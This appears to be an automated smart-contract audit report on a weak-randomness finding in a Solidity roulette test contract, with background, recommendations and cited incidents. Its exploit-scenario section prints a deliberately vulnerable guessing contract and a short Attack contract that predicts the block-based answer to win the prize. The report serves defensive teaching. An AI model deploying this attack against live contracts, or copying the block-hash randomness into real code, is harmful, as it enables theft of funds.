<button class='date-button'>2023-11-23</button>

# Audit Report

> 🔍 `Filename`: /Users/sikk/Desktop/Antibug/SafeDevAnalyzer/test/prng/roulette.sol
---

[<button class='styled-button'>Korean</button>](roulette_kr.md)
<br />


<style>
    .date-button{
        color:black;
        border:none;
        font-weight: bold;
        background-color: sand;
        width: 150px;
        height: 25px;
        float: right;
        border-radius: 20px;
    }
    .styled-button{
        color: black;
        border: none;
        font-weight: bold;
        background-color: lightskyblue;
        width: 100px;
        height: 30px;
        float: right;
        border-radius: 20px;
    }
    .styled-button:hover{
        color: black;
        border: none;
        font-weight: bold;
        background-color: pink;
        width: 100px;
        height: 30px;
        float: right;
        cursor: pointer;
    }
</style>

               
<details>
<summary style='font-size: 20px;'>weak-prng</summary>
<div markdown='1'>

## Detect Results

| Detector | Impact | Confidence | Info |
|:---:|:---:|:---:|:---:|
| weak-prng | <span style='color:lightcoral'> High </span> | <span style='color:olivedrab'> Medium </span> | GuessTheRandomNumber.guess(uint256) (roulette.sol#5-17) uses a weak PRNG: "answer = uint256(keccak256(bytes)(abi.encodePacked(blockhash(uint256)(block.number - 1),block.timestamp))) (roulette.sol#6-8)" 
 |||


## Vulnerabiltiy in code:

```solidity
line 5:     function guess(uint _guess) public {

```
 ---

 ```solidity
line 6:         uint answer = uint(

```
 ---

 
<details>

<summary style='font-size: 18px; color:pink;'> 💡 Background </summary><br />

- Randomness in blockchain can be categorized into two types: pseudo-randomness and true randomness.
    - Pseudo-randomness is generated by deterministic algorithms, and if you know the initial seed value, it can be predicted. 
    - True randomness relies on entropy sources and generates random values that are unpredictable.

- Nodes in a blockchain network can generate pseudo-randomness using various algorithms, and this randomness is used in scenarios such as selecting lottery winners, distributing rewards, determining the rarity of NFT token items in games, and distributing loot.
- However, blockchain ensures that all nodes in the network reach the same conclusion, so if the same input is provided, the output of a contract will always be the same.   
    
</details>

<br />

## Description:


In blockchain, it is not possible to generate true randomness. 
The absence of true randomness means that the results of random number generation can be predicted, allowing for manipulation.

True randomness relies on unpredictable external factors such as atmospheric noise or user actions, but smart contracts do not have direct access to such factors, making it impossible to generate true randomness. 
This limitation is particularly important when smart contracts are used for security mechanisms like private key generation, as attackers could potentially predict the private keys and gain unauthorized access to accounts or funds.
There are two main methods for generating random numbers in blockchain:

1. Using Randomness from the Blockchain Network Nodes:

   Blockchain networks provide certain variables in each block, such as `block.basefee(uint)`, `block.chainid(uint)`, `block.coinbase()`, `block.difficulty(uint)`, `block.gaslimit(uint)`, `block.number(uint)`, `block.timestamp(uint)`, and `blockhash(uint)`. 
   Among these, `block.difficulty`, `blockhash`, `block.number`, and `block.timestamp` are commonly used for random number generation.
   
   https://docs.soliditylang.org/en/latest/units-and-global-variables.html#block-and-transaction-properties:~:text=use%20utility%20functions.-,Block%20and%20Transaction%20Properties,%EF%83%81,-blockhash(uint%20blockNumber
   
   Randomness generated based on block data can limit the ability of typical users to predict the random numbers, but malicious miners can potentially manipulate block data to influence the generated randomness. 
   Block data remains the same for a given block, meaning that generating randomness from the same block will always produce the same result.

2. Using External Random Number Generators:

   Blockchain oracles can be used to generate random number seeds, and off-chain data can be obtained on-chain using on-chain oracles. 
   External randomness sources, such as API data, can be fetched and used to influence contract behavior. 
   This can increase unpredictability compared to generating randomness using blockchain variables, but it may introduce trust issues related to the oracle's reliability.
    

## Recommendation:


- It is advisable not to use `block.hash` and `block.timestamp` as sources for random number generation.
- Utilizing a `Commit-Reveal Scheme,` where participants commit values in advance and all commits are submitted before the actual values are revealed, is a good approach for generating randomness.
- Using decentralized solutions like `Chainlink VRF (Verifiable Random Function)` that leverage multiple inputs to generate random numbers is recommended.
- Employing hardware random number generators (RNG) to produce unpredictable, truly random values is a secure choice, making it difficult for attackers to predict the outcome.    
    
    

## Exploit scenario:


```solidity
contract GuessTheRandomNumber {
    constructor() payable {}
    function guess(uint _guess) public {
        uint answer = uint(
            keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))
        );
 
        if (_guess == answer) {
            (bool sent, ) = msg.sender.call{value: 1 ether}("");
            require(sent, "Failed to send Ether");
        }
    }
 }
```
 
- If you are generating random numbers by combining the `blockhash` and `block.timestamp` of the previous block as a seed, this is used in a contract where users can guess a number, and if their guess matches the generated number, they win `1 ether`. 
- While it may seem like randomness has been introduced, it's important to note that it can still be manipulated. 

```solidity
contract Attack {
    receive() external payable {}

    unction attack(GuessTheRandomNumber guessTheRandomNumber) public {
        uint answer = uint(
            keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))
        );
 
        guessTheRandomNumber.guess(answer);
    }
 
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
 }
```    

- The attacker deploys the `Attack` contract by providing the address of the `GuessTheRandomNumber` contract. 
- In the `attack` function, the attacker replicates the guessing logic of the `GuessTheRandomNumber` contract, using the same method of combining the `blockhash` and `block.timestamp` of the previous block as a seed to generate random numbers.

- Since the `GuessTheRandomNumber` contract's `guess` function is executed in the same block, the values of `block.number` and `block.timestamp` remain unchanged within that block. 
- This allows the attacker to generate the same random number and, as a result, claim the `1 ether` prize.


## Real World Examples:


1. `SmartBillions ICO (2017)`: SmartBillions was an Ethereum-based lottery platform where an attacker was able to manipulate the lottery game's results to claim prizes fraudulently.
    https://etherscan.io/address/0x5ace17f87c7391e5792a7683069a8025b83bbd85
    https://www.reddit.com/r/ethereum/comments/74d3dc/smartbillions_lottery_contract_just_got_hacked/   
     
2. `Fomo3D (2018)`: Fomo3D was an Ethereum smart contract-based game where an attacker could manipulate the game's outcome to dishonestly win prizes.
    https://etherscan.io/address/0xa62142888aba8370742be823c1782d17a0389da1
    https://medium.com/@zhongqiangc/randomness-in-smart-contracts-is-predictable-and-vulnerable-fomo3d-part-1-4d500c628191
    

## Reference:


- https://www.slowmist.com/articles/solidity-security/Common-Vulnerabilities-in-Solidity-Randomness.html
- https://medium.com/@solidity101/100daysofsolidity-072-source-of-randomness-in-solidity-smart-contracts-ensuring-security-and-7af014bfac22
- https://dev.to/natachi/attack-vectors-in-solidity-09-bad-randomness-also-known-as-the-nothing-is-secret-attack-ca9
- https://medium.com/rektify-ai/bad-randomness-in-solidity-8b0e4a393858
    

</details>

